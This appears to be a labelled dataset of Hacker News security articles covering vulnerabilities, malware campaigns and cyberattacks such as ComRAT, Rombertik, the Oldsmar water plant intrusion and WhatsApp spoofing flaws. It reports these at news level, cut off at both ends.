when I go to view the page source, both browsers bring up the code for the original ""source.html."" The second downfall is that if the user tries to refresh the page, he or she will be taken to the fake HTML page. As far as I know, there is no sure way to prevent this side effect. Finally, I would like to point out that this ""exploit"" is just a cool trick. It cannot be used to prevent someone from retrieving the source code of a web page. If a browser can access a page's source code, a human can access that page's source code. Maybe someone else can think of a more interesting use of the trick. I hope you like it! You can download both sample files Here Submitted By : John Kurlak Website: https://www.kurlak.com ",Vulnerability Critical OS X Flaw Grants Mac Keychain Access to Malware,https://thehackernews.com/2015/09/mac-os-x-vulnerability.html,"Back in July, a security researcher disclosed a zero-day vulnerability in Mac OS X that allowed attackers to obtain unrestricted root user privileges with the help of code that even fits in a tweet. The same vulnerability has now been upgraded to again infect Mac OS X machines even after Apple fixed the issue last month. The privilege-escalation bug was once used to circumvent security protections and gain full control of Mac computers. Thanks to the environment variable DYLD_PRINT_TO_FILE Apple added to the code of OS X 10.10 Yosemite. The vulnerability then allowed attackers to install malware and adware onto a target Mac, running OS X 10.10 (Yosemite), without requiring victims to enter system passwords. However, the company fixed the critical issue in the Mac OS X 10.11 El Capitan Beta builds as well as the latest stable version of Mac OS X – Version 10.10.5. Mac Keychain Flaw Now, security researchers from anti-malware firm MalwareBytes spotted the updated version of the same highly questionable malicious installer is now accessing user's Mac OS X keychain without user's permission. Once executed, the updated installer throws an installer request that asks for permission to access the user's OS X keychain. The installer automatically simulates a click on the ""Allow"" button as soon as it appears, which allows it to gain access to the Safari Extensions List, said MalwareBytes researcher Thomas Reed. This allows the malicious installer to install a Genieo Safari extension. The entire process of installing a malicious extension and gain access to OS X keychain takes just a fraction of a second. You're Totally Screwed Up However, the more worrisome part is that the installer could easily be modified to grant attackers access to other data from the keychain alongside passwords for user's Gmail account, iCloud account, and other important accounts. Meanwhile, two security researchers from Beirut independently reported the Mac Keychain vulnerability on Tuesday, the same day Malwarebytes researchers disclosed their findings involving Genieo. The technique works on Mac systems only when invoked by an app already installed on user's systems. The issue is critical because the Mac keychain is supposedly the protected place for storing account passwords and cryptographic keys. Apple has yet to respond to this latest issue. Until then, Mac users are advised to follow the standard security practices, such as do not download files from unknown or untrusted sources, and be wary of emails or websites that seem suspicious. ",Vulnerability "Chinese APT Espionage campaign, dubbed 'Icefog' targeted Military contractors and Governments",https://thehackernews.com/2013/09/chinese-apt-espionage-campaign-dubbed.html,"Kaspersky Lab has identified another Chinese APT campaign, dubbed 'Icefog', who targeted Governmental institutions, Military contractors, maritime / shipbuilding groups, telecom operators, industrial and high technology companies and mass media. The Hacking group behind the attack who carry out surgical hit and run operations, is an advanced persistent threat (APT) group, used a backdoor dubbed Icefog that worked across Windows and Mac OS X to gain access to systems. ""The Mac OS X backdoor currently remains largely undetected by security solutions and has managed to infect several hundred victims worldwide,"" the report (PDF) said. This China-based campaign is almost two years old and follows the pattern of similar APT-style attacks where victims are compromised via a malicious attachment in a spear-phishing email, or are lured to a compromised website and infected with malware. The attackers embed exploits for several known vulnerabilities (CVE-2012-1856 and CVE-2012-0158) into Microsoft Word and Excel documents. Once a computer has been compromised, the hackers upload malicious tools and backdoors. They look for email account credentials, sensitive documents and passwords to other systems. ""We observed many victims in several other countries, including Taiwan, Hong Kong, China, USA, Australia, Canada, UK, Italy, Germany, Austria, Singapore, Belarus and Malaysia,"" the research team said. There is no concrete evidence to confirm this was a nation-state sponsored operation, but based on where the stolen data were transferred to, Kaspersky wrote the attackers are assumed to be in China, South Korea and Japan. In total, Kaspersky Lab observed more than 4,000 uniquely infected IPs and several hundred victims. They are now in contact with the targeted organizations as well as government entities in order to help them identify and eradicate the infections. ",Malware New ComRAT Malware Uses Gmail to Receive Commands and Exfiltrate Data,https://thehackernews.com/2020/05/gmail-malware-hacker.html,"Cybersecurity researchers today uncovered a new advanced version of ComRAT backdoor, one of the earliest known backdoors used by the Turla APT group, that leverages Gmail's web interface to covertly receive commands and exfiltrate sensitive data. ""ComRAT v4 was first seen in 2017 and known still to be in use as recently as January 2020,"" cybersecurity firm ESET said in a report shared with The Hacker News. ""We identified at least three targets: two Ministries of Foreign Affairs in Eastern Europe and a national parliament in the Caucasus region."" Turla, also known as Snake, has been active for over a decade with a long history of the watering hole and spear-phishing campaigns against embassies and military organizations at least since 2004. The group's espionage platform started off as Agent.BTZ, in 2007, before it evolved to ComRAT, in addition to gaining additional capabilities to achieve persistence and to steal data from a local network. It is now known that earlier versions of Agent.BTZ were responsible for infecting US military networks in the Middle East in 2008. In recent years, Turla is said to have been behind the compromise of French Armed Forces in 2018 and the Austrian Foreign Ministry early this year. Newer versions of ComRAT backdoor have since ditched Agent. BTZ's USB-stick infection mechanism in favor of injecting itself into every process of the infected machine and executing its primary payload in ""explorer.exe."" What's New in ComRAT v4? The ComRAT v4 (or ""Chinch"" by the malware authors), as the new successor is called, uses an entirely new code base and is far more complex than its earlier variants, according to ESET. The firm said the first known sample of the malware was detected in April 2017. ComRAT is typically installed via PowerStallion, a lightweight PowerShell backdoor used by Turla to install other backdoors. In addition, the PowerShell loader injects a module called ComRAT orchestrator into the web browser, which employs two different channels — a legacy and an email mode — to receive commands from a C2 server and exfiltrate information to the operators. ""The main use of ComRAT is discovering, stealing, and exfiltrating confidential documents,"" the researchers said. ""In one case, its operators even deployed a .NET executable to interact with the victim's central MS SQL Server database containing the organization's documents."" What's more, all the files related to ComRAT, with the exception of the orchestrator DLL and the scheduled task for persistence, are stored in a virtual file system (VFS). The ""mail"" mode works by reading the email address and the authentication cookies located in the VFS, connecting to the basic HTML view of Gmail, and parsing the inbox HTML page (using Gumbo HTML parser) to get the list of emails with subject lines that match those in a ""subject.str"" file in the VFS. For each email that meets the above criteria, the comRAT proceeds by downloading the attachments (e.g. ""document.docx,"" ""documents.xlsx""), and deleting the emails to avoid processing them a second time. Despite the "".docx"" and "".xlsx"" format in the filenames, the attachments are not documents themselves, but rather encrypted blobs of data that include a specific command to be executed: read/write files, execute additional processes, and gather logs. In the final stage, the results of the command execution are encrypted and stored in an attachment (with the double extension "".jpg.bfe""), which is then sent as an email to a target address specified in the ""answer_addr.str"" VFS file. The ""legacy"" mode, on the other hand, makes use of the already existing C2 infrastructure (ComRAT v3.x) to issue remote commands, the results of which are compressed and transmitted to a cloud service such as Microsoft OneDrive or 4Shared. The exfiltrated data comprises user details and security-related log files to check if their malware samples were detected during a scan of the infected systems. Based on the Gmail email distribution patterns over a one-month period, ESET said the operators behind the campaign are working in the UTC+3 or UTC+4 time zones. ""Version four of ComRAT is a totally revamped malware family released in 2017,"" ESET researcher Matthieu Faou said. ""Its most interesting features are the Virtual File System in FAT16 format and the ability to use the Gmail web UI to receive commands and exfiltrate data. Thus, it is able to bypass some security controls because it doesn't rely on any malicious domain."" ",Cyber_Attack Hackers Can Remotely Steal Fingerprints From Android Phones,https://thehackernews.com/2015/08/hacking-android-fingerprint.html,"Over a year ago I wrote an article on The Hacker News that warned of serious security concerns created by the iPhone and Android's Fingerprint authentication. Till now hackers were impersonated simply by lifting prints off the side of a phone and gaining unauthorized access to user's phone and thus data. However, security researchers have now discovered four new ways to attack Android devices to extract user fingerprints remotely without letting the user know about it. The attack, which the researchers dubbed the ""Fingerprint Sensor Spying attack,"" could be used by hackers to ""remotely harvest fingerprints in a large scale,"" Yulong Zhang, one of the researchers told ZDNet. Remotely Hacking Android Fingerprints FireEye researchers Tao Wei and Yulong Zhang presented their research in a talk titled, Fingerprints on Mobile Devices: Abusing and Leaking, at the Black Hat conference in Las Vegas on Wednesday, where they outlined new ways to attack Android devices in an effort to extract user fingerprints. The new attack is limited mostly to Android devices with Fingerprint Sensors that helps the user to authenticate their identity by simply touching their phone's screen, instead of by entering a passcode. Researchers confirmed the attack on the HTC One Max and Samsung's Galaxy S5, which allowed them to stealthily obtain a fingerprint image from the device because vendors don't lock down fingerprint sensors well enough. The attack affects mobile phones by major manufacturers including handsets delivered by Samsung, HTC, and Huawei. Fingerprints vs. Passwords If we give a thought, then stolen fingerprints would be an even worse scenario than stolen passwords because you can change your passwords when breached but not just replace your fingerprints. ""In this attack, victims' fingerprint data directly fall into attacker's hand. For the rest of the victim's life, the attacker can keep using the fingerprint data to do other malicious things,"" said Zhang. The good news is that the issue is relatively easy to fix by adding encryption to the fingerprint data on Android devices, and affected vendors have since released patches after being alerted by the researchers. Researchers have not shared any ""proof-of-concept"" detailing exactly how the fingerprint stealing attack can be executed remotely. Meanwhile Apple users can just sit and relax, as it appears that iPhone and iPad's Touch ID is ""quite secure"" because it encrypts fingerprint data from the scanner with a crypto key, making it unreadable even if hackers gain access. Users need to note that Google doesn't yet officially support fingerprints in its mobile operating system, but it will soon do support fingerprint sensors with the Android M update. ",Vulnerability WhatsApp Flaw Lets Users Modify Group Chats to Spread Fake News,https://thehackernews.com/2018/08/whatsapp-modify-chat-fake-news.html,"WhatsApp, the most popular messaging application in the world, has been found vulnerable to multiple security vulnerabilities that could allow malicious users to intercept and modify the content of messages sent in both private as well as group conversations. Discovered by security researchers at Israeli security firm Check Point, the flaws take advantage of a loophole in WhatsApp's security protocols to change the content of the messages, allowing malicious users to create and spread misinformation or fake news from ""what appear to be trusted sources."" The flaws reside in the way WhatsApp mobile application connects with the WhatsApp Web and decrypts end-to-end encrypted messages using the protobuf2 protocol. The vulnerabilities could allow hackers to misuse the 'quote' feature in a WhatsApp group conversation to change the identity of the sender, or alter the content of someone else's reply to a group chat, or even send private messages to one of the group participants (but invisible to other members) disguised as a group message for all. In an example, the researchers were able to change a WhatsApp chat entry that said ""Great!""—sent by one member of a group—to read ""I'm going to die, in a hospital right now!"" It should be noted that the reported vulnerabilities do not allow a third person to intercept or modify end-to-end encrypted WhatsApp messages, but instead, the flaws could be exploited only by malicious users who are already part of group conversations. Video Demonstration — How to Modify WhatsApp Chats To exploit these vulnerabilities, the CheckPoint researchers—Dikla Barda, Roman Zaikin, and Oded Vanunu—created a new custom extension for the popular web application security software Burp Suite, allowing them to easily intercept and modify sent and received encrypted messages on their WhatsApp Web. The tool, which they named ""WhatsApp Protocol Decryption Burp Tool,"" is available for free on Github, and first requires an attacker to input its private and public keys, which can be obtained easily ""obtained from the key generation phase from WhatsApp Web before the QR code is generated,"" as explained by the trio in a blog post. ""By decrypting the WhatsApp communication, we were able to see all the parameters that are actually sent between the mobile version of WhatsApp and the Web version. This allowed us to then be able to manipulate them and start looking for security issues."" In the above-shown YouTube video, researchers demonstrated the three different techniques they have developed, which allowed them to: Attack 1 — Changing a Correspondent's Reply To Put Words in Their Mouth Using the Burp Suite extension, a malicious WhatsApp user can alter the content of someone else's reply, essentially putting words in their mouth, as shown in the video. Attack 2 — Change the Identity of a Sender in a Group Chat, Even If They Are Not a Member The attack allows a malicious user in a WhatsApp group to exploit the 'quote' feature—that lets users reply to a past message within a chat by tagging it—in a conversation to spoof a reply message to impersonate another group member and even a non-existing group member. Attack 3 — Send a Private Message in a Chat Group But When The Recipient Replies, The Whole Group Sees It The third WhatsApp attack allows a malicious group user to send a specially crafted message that only a specific person will be able to see. If the targeted individual responds to the same message, only then its content will get displayed to everyone in the group. WhatsApp/Facebook Choose to Left Reported Attacks Unpatched The trio reported the flaws to the WhatsApp security team, but the company argued that since these messages do not break the fundamental functionality of the end-to-end encryption, users ""always have the option of blocking a sender who tries to spoof messages and they can report problematic content to us."" ""These are known design trade-offs that have been previously raised in public, including by Signal in a 2014 blog post, and we do not intend to make any change to WhatsApp at this time,"" WhatsApp security team replied to the researchers. Another argument WhatsApp shared with researchers, in context of why the company can not stop the modification of the message content—""This is a known edge case that relates to the fact that we do not store messages on our servers and do not have a single source of truth for these messages."" ""My point was the misinformation, and WhatsApp plays a vital role in our day activity. So, In my point of view they indeed have to fix these issues,"" CheckPoint researcher Roman Zaikin said. ""It's always functionality vs. security, and this time WhatsApp choose functionality."" Since WhatsApp has become one of the biggest tools to spread fake news and misinformation, at least in countries with highly volatile political issues, we believe WhatsApp should fix these problems along with putting limits on the forwarded messages. ",Vulnerability Air Traffic Control System Failure Caused by Memory Shortage - A Cyber Attack?,https://thehackernews.com/2014/05/air-traffic-control-system-failure.html,"A shortage of computer memory in the $2.4 billion Air Traffic Control System caused a Computer crash that resulted in the System collapse, according to an insider close to the incident. The problems began on 30 April, when a U-2 spy plane flew over southwestern US caused the air traffic control system that manages the airspace around Los Angeles' LAX airport, built by Lockheed Martin, to crash due to which hundreds of flight delayed or cancelled two weeks ago. ""In theory, the same vulnerability could have been used by an attacker in a deliberate shut-down,"" security experts told Reuters. Now that the ""very basic limitation of the system"" is known, experts showed concerns about the cyber-attacks. Sources claimed to Reuters that on April 30, 2014 the aircraft traffic failed to obtain the altitude information for a single U-2 spy plane which was flying over the area because a controller entered the altitude of the spook flight into the En Route Automation Modernisation (ERAM) system, developed by Lockheed Martin. Lockheed Martin created the En Route Automation Modernization (ERAM) air traffic control system, claims it conducts ""robust testing"" on all its systems, so the shortage of altitude information in the U-2's flight plan caused the automated system to generate error messages and begin cycling through restarts. I NEED MORE MEMORY The system failure was caused due to the complex nature of the U-2's flight plan. The U-2's flight ERAM system failed because it limits how much data each plane can send it, however most of the aircraft have a simple flight plan do not exceed the limits as it restrict the data sent back to the ERAM. While an air traffic controller entered the usual altitude for a U-2 plane i.e. about 60,000 feet, the system began to calculate all possible altitudes between ground level and infinity for the flight, in order to ensure the U-2 plane wasn't on a crash course with other aircrafts. Now this process need ""a large amount of available memory and interrupted the computer's other flight-processing functions,"" according to a Federal Aviation Administration (FAA) spokesperson, Laura Brown. As a result, the air traffic system was completely fails to access parts of the US skies from West Coast to Arizona and from Nevada to the Mexico border. No accidents or injuries were reported, however it caused inconvenience to thousands of passengers who had their flights delayed or cancelled. In response, the FAA said it has changed the way traffic controllers obtain flight plan information and upgraded the computer systems with more memory, which should prevent similar episodes from occurring in the future. A CYBER ATTACK? Where some security experts say that the incident could be a part of cyber attack deliberately caused by hackers, others argue it would be impossible to recreate such specific conditions. Sources told Reuters that the original error is very difficult to replicate and added that there's no indication that it could be used to carry out any cyber attack. But according to security experts, it could be a cyber attack and the failure appeared to have been made possible by the sort of routine programming mistake that should have been identified in testing before it was deployed. Cyber attacks against physical infrastructure are becoming an interesting area for the hackers, however there are very few such activities seen in real scenario, the most famous among is Stuxnet case, used against uranium centrifuges in Iran. ",Cyber_Attack Google Drive Vulnerability Leaks Users' Private Data,https://thehackernews.com/2014/07/google-drive-vulnerability-leaks-users_9.html,"Another privacy issue has been discovered in Google Drive which could have led sensitive and personal information stored on the cloud service exposed to unauthorized parties. The security flaw has now patched by Google, but its discovery indicates that the vulnerability of cloud data when accessed via a link can allow ""anyone who has the link"" to access your private data without any further authentication. HOW THE SECURITY FLAW WORKS The security hole addressed a risk to files that included a clickable URL on your cloud file sharing service. When someone opens the file and clicks on an embedded hyperlink, then they get sent to the website of a third-party website owner. Upon accessing this URL, unfortunately the external Internet user - an unauthorized party - could potentially access your sensitive information by accessing the original documents that included the URL. GOOGLE EXPLANATION Google explained the actual nature of the security flaw in a blog post published last week. The company said that the flaw only affected a ""small subset of file types"" in Google Drive. The security issue is relevant only if all four of these conditions apply: The file was uploaded to Google Drive The file was not converted to Docs, Sheets, or Slides (i.e., remained in its original format such as .pdf, .docx, etc.) The owner changed sharing settings so that the document was available to ""anyone with the link"" The file contained hyperlinks to third-party HTTPS websites in its content If all the above mentioned conditions applied, a user who clicked on the embedded hyperlink could have inadvertently sent header information to the administrator of the third-party websites, allowing him or her to potentially see the URL of the original document that linked to his or her site. But Google assured its users that the newly shared documents with hyperlinks to third-party HTTPS websites, will not inadvertently relay the original document's URL. HOW TO PROTECT YOURSELF At the same time, If you've got any of yours previously shared documents that match any of those above four criteria, Google says you can generate a new and safe sharing link by following just three simple steps: Create a copy of the document, via File > ""Make a copy..."" Share the copy of the document with particular people or via a new shareable link, via the ""Share"" button Delete the original document The security flaw is similar to Dropbox hyperlink disclosure vulnerability discovered earlier this year by Intralinks. The hyperlink disclosure vulnerability in the Dropbox led to the exposure of personal documents and all sorts of stuff such as such as tax returns, bank records, mortgage applications, blueprints, and business plans, stored in Dropbox that you would not want to disclose. ",Vulnerability Zeus malware targeting BlackBerry and Android devices,https://thehackernews.com/2012/08/zeus-malware-targeting-blackberry-and.html,"Security researchers at Kaspersky Lab have discovered five new samples of the ZeuS-in-the-Mobile (ZitMo) malware package, targeting Android and BlackBerry devices. Zitmo (Zeus in the mobile) is the name given to the mobile versions of Zeus, and it's been around for a couple of years already, mostly infecting Android phones. The Zitmo variant has reportedly been operating for at least two years targeting Android phones by masquerading as banking security application or security add-on. ZitMo gets hold of banking information by intercepting all text messages and passing them on to attackers' own devices. It gets onto devices inside malicious applications, which users are duped into downloading. In this case, the malicious app was posing as security software called 'Zertifikat'. Once installed, the packages forward all incoming SMS messages to one of two command and control numbers located in Sweden, with the aim of snaring secure codes and other data. Kaspersky found mobile users in Spain, Italy and Germany were targeted by these fresh variants, with two command and control (C&C) numbers found on Sweden's Tele2 operator. ""The analysis of new Blackberry ZitMo files showed that there are no major changes. Virus writers finally fixed grammar mistake in the 'App Instaled OK' phrase, which is sent via SMS to C&C cell phone number when smartphone has been infected. Instead of 'BLOCK ON' or 'BLOCK OFF' commands (blocking or unblocking all incoming and outgoing calls) now there are 'BLOCK' and 'UNBLOCK' commands. Other commands which are received via SMS remain the same."" Denis Maslennikov, a researcher at Kaspersky Lab. The tactic is designed to help the criminals circumvent the out-of-band authentication systems used by many European banks, by hijacking the one-time password authentication password sent via SMS. Earlier this year, Kaspersky warned of a set of malicious Android applications posing as security software. Zeus was sitting behind those apps, ready to siphon off text messages. ",Malware Hacker Tried Poisoning Water Supply After Breaking Into Florida's Treatment System,https://thehackernews.com/2021/02/hacker-tried-poisoning-water-supply.html,"Hackers successfully infiltrated the computer system controlling a water treatment facility in the U.S. state of Florida and remotely changed a setting that drastically altered the levels of sodium hydroxide (NaOH) in the water. During a press conference held yesterday, Pinellas County Sheriff Bob Gualtieri said an operator managed to catch the manipulation in real-time and restored the concentration levels to undo the damage. ""At no time was there a significant effect on the water being treated, and more importantly the public was never in danger,"" Sheriff Gualtieri said in a statement. The water treatment facility, which is located in the city of Oldsmar and serves about 15,000 residents, is said to have been breached for approximately 3 to 5 minutes by unknown suspects on February 5, with the remote access occurring twice at 8:00 a.m. and 1:30 p.m. The attacker briefly increased the amount of sodium hydroxide from 100 parts-per-million to 11,100 parts-per-million using a system that allows for remote access via TeamViewer, a tool that lets users monitor and troubleshoot any system problems from other locations. ""At 1:30 p.m., a plant operator witnessed a second remote access user opening various functions in the system that control the amount of sodium hydroxide in the water,"" the officials said. Sodium hydroxide, also known as lye, is a corrosive compound used in small amounts to control the acidity of water. In high and undiluted concentrations, it can be toxic and can cause irritation to the skin and eyes. It is not immediately known if the hack was done from within the U.S. or outside the country. Detectives with the Digital Forensics Unit said an investigation into the incident is ongoing. Although an early intervention averted more serious consequences, the sabotage attempt highlights the exposure of critical infrastructure facilities and industrial control systems to cyberattacks. The fact that the attacker leveraged TeamViewer to take over the system underscores the need for securing access with multi-factor authentication and preventing such systems from being externally accessible. ""Manually identify software installed on hosts, particularly those critical to the industrial environment such as operator workstations — such as TeamViewer or VNC,"" said Dragos researcher Ben Miller. ""Accessing this on a host-by-host basis may not be practical but it is comprehensive."" ""Remote access requirements should be determined, including what IP addresses, what communication types, and what processes can be monitored. All others should be disabled by default. Remote access including process control should be limited as much as possible."" ",Cyber_Attack Rombertik Malware Destroys Hard Drives to Avoid Detection,https://thehackernews.com/2015/05/malware-destroy-hard-drive.html,"Security researchers have discovered a new strain of malware that makes use of extraordinary measures to evade detection and analysis, making the computer it infects unusable. Dubbed Rombertik, which is ""unique"" among other self-destructing malware samples due to its unique evasion techniques. As soon as any analysis tool is detected, Rombertik attempts to delete the device's Master Boot Record (MBR) and home directories, making the machine constantly restart. Rombertik is a complex piece of spyware designed to ""indiscriminately"" collect everything a user does online in order to obtain victim's login credentials and other confidential information. Infects users via Phishing campaign: Rombertik typically gets installed on vulnerable machines when users click on malicious attachments included in phishing emails, Cisco security researchers Ben Baker and Alex Chiu said in a blog post Monday. Once loaded into the system, Rombertik first runs a series of anti-analysis checks to determine if it is running within a sandbox. In case it isn't running within the sandbox, Rombertik decrypts and installs itself on the victim's machine, which then allows the malware to launch a second copy of itself and overwrite the second copy with the malware's core spying functionality. Here's the kicker: After completing this process and before begins spying on users, Rombertik runs a final check to make sure it is not being analyzed in memory. In case it finds any indication of being analyzed, the spyware attempts to destroy the master boot record (MBR) of the vulnerable computer. Rombertik then restarts the machine, and because now the MBR is missing from the hard drive, the victim's computer will go into an endless restart loop. MBR is the first sector of a computer's hard drive that the system looks for before loading the operating system. However, deleting or destroying MBR involves re-installing of operating system, which means valuable data is lost. In cases where the malware is under the microscope of security experts or any rival malware author, Rombertik will self-destruct itself, taking the contents of a victim's hard drive along with it. Security researchers reverse-engineered the malware and found that Rombertik contains volumes of ""garbage code"" that have to be analyzed. The researchers were able to capture a small sample and found that… ...the unpacked Rombertik sample was 28KB in size while the packed version is 1264KB, including 75 images and 8,000 functions that are never used. Rombertik other Tricks involve: Moreover, Rombertik keeps itself in sandboxes by writing a random byte of data to memory 960 million times in an effort to overwhelm analysis tools that try to detect malware by logging system activity. ""If an analysis tool attempted to log all of the 960 million write instructions, the log would grow to over 100 gigabytes,"" researchers explained in a blog post. ""Even if the analysis environment was capable of handling a log that large, it would take over 25 minutes just to write that much data to a typical hard drive. This complicates the analysis."" Data wiping and Self-destructing malware: Data wiping and self-destructing malware are not new. In last three years, we have seen a hike in malware evasion capabilities. Wiper malware was used against South Korean banks and TV broadcasters in 2013 as well as against Sony Pictures Entertainment last year, which marked history in a massive data breach. Also last year, the German Aerospace Centre was targeted by a self-destructive malware in an espionage attack, believed to be conducted by China. TIP The best way to keep your systems away from such malware is to have a best antivirus for PCs, as well as avoid opening malicious or suspicious links served via phishing emails. ",Malware Apple's Find My Network Can be Abused to Exfiltrate Data From Nearby Devices,https://thehackernews.com/2021/05/apples-find-my-network-can-be-abused-to.html,"Latest research has demonstrated a new exploit that enables arbitrary data to be uploaded from devices that are not connected to the Internet by simply sending ""Find My"" Bluetooth broadcasts to nearby Apple devices. ""It's possible to upload arbitrary data from non-internet-connected devices by sending Find My [Bluetooth Low Energy] broadcasts to nearby Apple devices that then upload the data for you,"" Positive Security researcher Fabian Bräunlein said in a technical write-up disclosed last week. The study builds on a previous analysis by TU Darmstadt published in March 2021, which disclosed two distinct design and implementation flaws in Apple's crowdsourced Bluetooth location tracking system that could lead to a location correlation attack and unauthorized access to a user's location history of the past seven days. The investigation was augmented by the release of a framework called OpenHaystack that's designed to let any user create an ""AirTag,"" enabling individuals to track personal Bluetooth devices via Apple's massive Find My network. But the reverse engineering of Apple's Find My offline finding system also left the door open to the possibility that the protocol could be emulated to upload arbitrary data to the Internet by broadcasting the information via Bluetooth beacons that would get picked up by Apple devices in close physical proximity, and then subsequently relay the encrypted data to Apple's servers, from where a macOS application can retrieve, decode, and display the uploaded data. One of the core aspects of Find My is its rotating key scheme consisting of a pair of public-private keys that are deterministically changed every 15 minutes, with the public key sent within the Bluetooth Low Energy advertisement packet. Thus when nearby Apple devices such as MacBooks, iPhones, and iPads receive the broadcast, they fetch their own location, then encrypt the location using the aforementioned public key before sending the encrypted location report to iCloud along with a hash of the public key. In the final step, the owner of the lost device can use a second Apple device signed in with the same Apple ID to access the approximate location. The encryption protections mean that not only does Apple not know which public keys belong to a specific lost device or AirTag, it also doesn't have any knowledge of which location reports are intended for a specific user — hence the above Apple ID requirement. ""The security solely lies in the encryption of the location reports: The location can only be decrypted with the correct private key, which is infeasible to brute force and only stored on the paired Owner Device,"" Bräunlein said. The idea, therefore, is to exploit this gap by encoding a message into the broadcast payloads and then obtaining them on the other end using a data fetcher component based on OpenHaystack that decrypts and extracts the information transmitted from the sender device, say, a microcontroller. ""When sending, the data is encoded in the public keys that are broadcasted by the microcontroller. Nearby Apple devices will pick up those broadcasts and forward the data to an Apple backend as part of their location reporting. Those reports can later be retrieved by any Mac device to decode the sent data,"" Bräunlein explained. While malicious real-world implications of such an exploit may seem moot, it's also difficult for Apple to defend against an attack of this kind due to the inherent end-to-end encrypted nature of the Find My network. To counter any potential misuse, the researcher suggests hardening the system in two possible ways, including authenticating the BLE advertisement and applying rate limits on-location report retrievals by caching the hashes and ensuring that the only ""16 new key ids are queried per 15 minutes and Apple ID."" It's worth noting that there is a limit of 16 AirTags per Apple ID. ""In the world of high-security networks, where combining lasers and scanners seems to be a noteworthy technique to bridge the air gap, the visitor's Apple devices might also become feasible intermediaries to exfiltrate data from certain air gapped systems or Faraday caged rooms,"" Bräunlein said. ",Malware Chinese search engine Baidu launches free Antivirus Suite,https://thehackernews.com/2013/03/chinese-search-engine-baidu-launches.html,"Chinese search engine Baidu has just launched a security product called Baidu Antivirus 2013. Described as a ultra light weight, easy to use, extremely fast anti-virus program that promises to protect your system from malware, viruses, spyware, adware and other malicious programs. Most interesting thing is that Baidu Antivirus comes only in English. Back in January, Baidu launched Baidu PC Faster, a software suite designed to fix speed and performance issues. The program combines the Baidu Antivirus Engine and Baidu Cloud Security Engine with the Avira Antivirus engine to provide you with complete protection against all online threats. ""Baidu Antivirus offers an easy to use interface with several advanced configuration options as well as quarantine of infected files. It also has an extremely small memory footprint, so you can actually do other things while it is running on your computer. Other features include automatic updates, Host Intrusion Prevention System (HIPS), scan reports and more."" description reads. You can download Baidu Antivirus 2013 here and please note that, its a Chinese product, so use at your own risk ! ",Malware Hackers threaten to take down Xbox Live and PSN on Christmas Day,https://thehackernews.com/2016/12/christmas-ddos-attack.html,"Bad news for gamers! It's once again the time when most of you will get new PlayStations and XBoxes that continue to be among the most popular gifts for Christmas, but possibilities are you'll not be able to log into the online gaming console, just like what happens on every Christmas holidays. On 2014 Christmas holidays, the notorious hacker group Lizard Squad knocked the PlayStation Network and Xbox Live offline for many gamers by launching massive DDoS attacks against the gaming networks. This time a new hacking group, who managed to take down Tumblr this week for almost two hours, has warned gamers of launching another large-scale distributed denial-of-service (DDoS) attack against XBox Live and PlayStation networks. Calling itself R.I.U. Star Patrol, the hacking group, posted a video on YouTube, announcing that they're planning to take down Sony's PSN and Microsoft's Xbox Live on Christmas Day by launching coordinated DDoS attacks. ""We do it because we can,"" the group said. ""We have not been paid a single dollar for what we do."" On Wednesday, when R.I.U. Star Patrol took down Tumblr, the group contacted Mashable and explained its reason for attacking: ""There is no sinister motive. It's all for light hearted fun."" Neither Sony nor Microsoft has yet responded to the hackers' warning. However, both Sony and Microsoft previously promised to enhance the protection of their systems to block any attack disrupting their networks, but downtime and short outages happened almost every Christmas time. Knowing the current abilities of hackers to launch DDoS attack that can reach 1 Tbps, it goes without saying that both the companies should be prepared to see DDoS attacks targeting its servers on this Christmas that can go beyond their expectations. We saw coordinated DDoS attacks against DNS hosting provider Dyn last fall that broke large portions of the Internet, causing a significant outage to a ton of websites and services, including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify. The massive DDoS attack was launched just by a botnet of an estimated 100,000 so-called Internet of Things (IoT) – everyday devices and appliances that are connected to the web – that closed down the Internet for millions of users. So, it remains to be seen if gamers would be able to enjoy this Christmas or not. ",Cyber_Attack Small satellite terminals (VSAT) are vulnerable to Cyber attack,https://thehackernews.com/2014/01/small-satellite-terminals-vsat-are.html,"The Military Units that rely on very small aperture terminals (VSATs) for satellite communications in remote areas are vulnerable to cyber attack. Researchers from cyber intelligence company IntelCrawler recently identified nearly 3 million VSATs, many of them in the United States, and found that about 10,000 of them could be easily accessed because of configuration weaknesses. ""We have scanned the whole IPv4 address space since 2010 and update the results in our Big Data intelligence database, including details about the satellite operator's network ranges, such as INMARSAT, Asia Broadcast Satellite, VSAT internet iDirect, Satellite HUB Pool, and can see some vulnerabilities,"" Researchers have warned that terminals having data transmission rate 4kbps to 16 Mbps used in narrow and broadband data transmission are vulnerable to cyber attack. VSATs are most commonly used to transmit narrowband data such as credit card, polling or RFID data or broadband data for VoIP or video using the Satellites in geosynchronous orbit generally used for Television & Radio broadcast, direct broadcast, military communication. Its name originated from the relatively small dish antenna with a diameter no longer than 10 feet (3 meters). IntelCrawler claimed that VSAT can be easily hacked because of poor password policy & default settings. Vulnerable terminals can be used for a planned cyber-attack, to be more precise on distributed network and infrastructure. Dan Clements, IntelCrawler's President said: ""Many VSAT devices have Telnet access with very poor password strength, many times using default factory settings,"" ""Intrusions to such open devices can allow you to monitor all the network traffic related to the exact device or host, sometimes with very sensitive information, which can lead to a compromise of the internal network,"" ""The door might be six inches open, and of course you're not going in, but you can see there's a vulnerability there,"" ""There's a lot of information that could be used in a nefarious way,"" Clements said. ""Certainly you could put together a plan to go after certain grids or dams or power plants and have access to the centralized network at some point."" According to the report, there are more than 313 open UHP VSAT, 9045 open terminals (HUGHES) and 1,142 terminals (SatLink), that can be easily hacked by malicious attackers. HUGHES is one of the largest manufacturers of VSATs which are mostly used in offline ATMs by several national central banks. Physical locations of a number of VSATs can be easily searched on Google maps and Google Earth, which could allow attackers to plan more sophisticated physical attacks. ""They are also widely spread in the industrial sector, such as energy, oil and gas, where the whole infrastructure is based on distributed environments located in different regions, cities or sometimes continents. According to statistics, there are 2,931,534 active VSAT terminals in the world now, with the majority installed in the US."" according to the The Comsys VSAT report. IntelCrawler also found network ranges of government and classified communications, e.g. Ministry of Civil Affairs of China infrastructure in ranges belongs to Shanghai VSAT Network Systems Co. LTD, and Ministry of Foreign Affairs of Turkey in Turksat VSAT Services, that poses critical threat to National Security. ",Cyber_Attack GLitch: New 'Rowhammer' Attack Can Remotely Hijack Android Phones,https://thehackernews.com/2018/05/rowhammer-android-hacking.html,"For the very first time, security researchers have discovered an effective way to exploit a four-year-old hacking technique called Rowhammer to hijack an Android phone remotely. Dubbed GLitch, the proof-of-concept 